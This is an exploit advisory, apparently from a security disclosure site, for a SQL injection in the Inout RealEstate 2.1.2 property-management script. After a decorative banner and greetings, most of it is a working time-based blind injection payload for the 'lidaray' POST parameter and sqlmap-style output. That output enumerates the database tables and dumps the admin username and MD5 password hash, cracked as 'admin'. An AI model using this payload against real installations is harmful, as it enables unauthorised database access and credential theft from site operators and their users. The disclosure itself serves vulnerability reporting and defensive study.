Inout RealEstate 2.1.2 SQL Injection

2022.08.15
Credit: CraCkEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : inoutscripts.com │ │ │ │ Vendor : Inout Scripts │ │ │ │ Software : Inout RealEstate 2.1.2 │ │ Inout RealEstate is an easy, flexible │ │ Vuln Type: Remote SQL Injection │ │ and simple property management solution │ │ Method : GET │ │ ideal for business start-ups │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7 CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ POST parameter 'lidaray' is vulnerable. --- Parameter: lidaray (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lidaray=20MKTTVT24' AND (SELECT 1823 FROM (SELECT(SLEEP(5)))Caim) AND 'bHOb'='bHOb --- [INFO] the back-end DBMS is MySQL [INFO] fetching current database current database: 'inout_realestate' fetching tables for database: 'inout_realestate' Database: inout_realestate [45 tables] +--------------------------------+ | adcode | | admin_account | | admin_payment_details | | agent_list_request_to_user | | broker_citymap | | broker_rate | | broker_review | | brokerabusereport | | category_property | | chat_details | | chat_messages | | checkout_ipn | | countries | | custom_field | | detail_statistics_list | | email_templates | | enquiry_status | | forgetpassword | | inout_ipns | | invoicegen | | languages | | list_brokermap | | list_images | | list_main | | listopenhouse | | normal_statistics_list | | paymentdetailstat | | ppc_currency | | public_side_media_detail | | public_slide_images | | pupularsiarchlist | | recentsearchlist | | settings | | sold_listing | | soldlistadd | | traveller_bank_deposit_history | | user_broker_licenses | | user_broker_registration | | user_email_verification | | user_list_agent_request | | user_registration | | user_wishlist_mapping | | userabusereport | | userlistactive | | wish_list | +--------------------------------+ [INFO] fetching columns for table 'admin_account' in database 'inout_realestate' Database: inout_realestate Table: admin_account [6 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | admin_type | tinyint(4) | | id | int(11) | | logouttime | int(11) | | password | varchar(255) | | status | tinyint(4) | | username | varchar(200) | +------------+--------------+ [INFO] fetching entries of column(s) 'admin_type,id,password,username' for table 'admin_account' in database 'inout_realestate' Database: inout_realestate Table: admin_account [1 entry] +----+----------+------------------------------------------+------------+ | id | username | password | admin_type | +----+----------+------------------------------------------+------------+ | 1 | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | 0 | +----+----------+------------------------------------------+------------+ [-] Done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top